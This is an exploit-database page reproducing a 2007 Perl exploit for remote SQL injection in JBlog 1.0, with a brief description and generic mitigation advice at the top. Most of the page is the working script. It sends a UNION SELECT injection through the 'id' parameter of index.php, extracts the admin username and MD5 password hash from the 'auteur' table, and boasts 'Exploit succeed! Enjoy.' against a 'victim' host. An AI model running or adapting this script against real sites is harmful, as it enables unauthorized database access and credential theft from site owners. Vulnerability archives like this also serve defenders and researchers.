header-logo
Suggest Exploit
vendor:
by:
S4mi
N/A
CVSS
N/A
Remote SQL injection Exploit
CWE
Product Name:
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

JBlog ver 1.0

The JBlog ver 1.0 script is vulnerable to remote SQL injection. An attacker can use the 'id' parameter in the index.php and modifpost.php files to inject SQL queries, allowing them to retrieve sensitive information from the database. The exploit sends a GET request with a specially crafted 'id' parameter to retrieve the login and password of the admin user from the 'auteur' table. The password is hashed with the MD5 algorithm.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, using strong and unique passwords, as well as implementing proper access controls, can help protect against unauthorized access.
Source

Exploit-DB raw data:

##################################################
#	Script....................................: JBlog ver 1.0
#	Script Site...........................: http://www.jmuller.net/jblog/index.php
#	Vulnerability........................: Remote SQL injection Exploit
#	Access..................................: Remote
#	level......................................: Dangerous
#	Author..................................: S4mi 
#	Contact.................................: S4mi[at]LinuxMail.org 
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#Vuln :
#http://127.0.0.1/jblog/index.php?id=[SQL]
#http://127.0.0.1/jblog/admin/modifpost.php?id=[SQL]  (shoud have access to admin area "use my last JBlog Xploit")
#Probably Other files are affected
#*************************************
#Usage  :       C:\Xploit.pl  127.0.0.1  /Jblog/
#Result Screen Shout :
#*************************************
# Connecting ...[OK]
# Sending Data ...[OK]
#
#  + Exploit succeed! Enjoy.
#  + ---------------- +
#  + Password: e10adc3949ba59abbe56e057f20f883e
#  + Username: admin
###################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1]));

$host = $ARGV[0];
$path = $ARGV[1];

syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
								
die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

$inject = "union%20select%200,login,pass,3,4,5%20from%20auteur%20WHERE%20id=1/*";	

syswrite STDOUT ,"\n Sending Data ...";

print $sock "GET $path/index.php?id='$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /class='titre'>(.*?)<\/span>/){
print "+ Exploit succeed! Enjoy.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
}	
if($answer =~ / '(.*?)' /){
print "+ Username: $1\n";
}
}

sub usage{
	print "\nUsage   : perl $0 host /path/ ";
	print "\nExemple : perl $0 www.victim.com /JBlog/\n";
	exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script.................: JBlog ver 1.0
Script Site............: http://www.jmuller.net/jblog/index.php
Vulnerability..........: Remote SQL injection Exploit
Access.................: Remote
level..................: Dangerous 
Author.................: S4mi
Contact................: S4mi[at]LinuxMail.org 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

# milw0rm.com [2007-09-14]

Navigation

Suggest Exploit

Services By CQR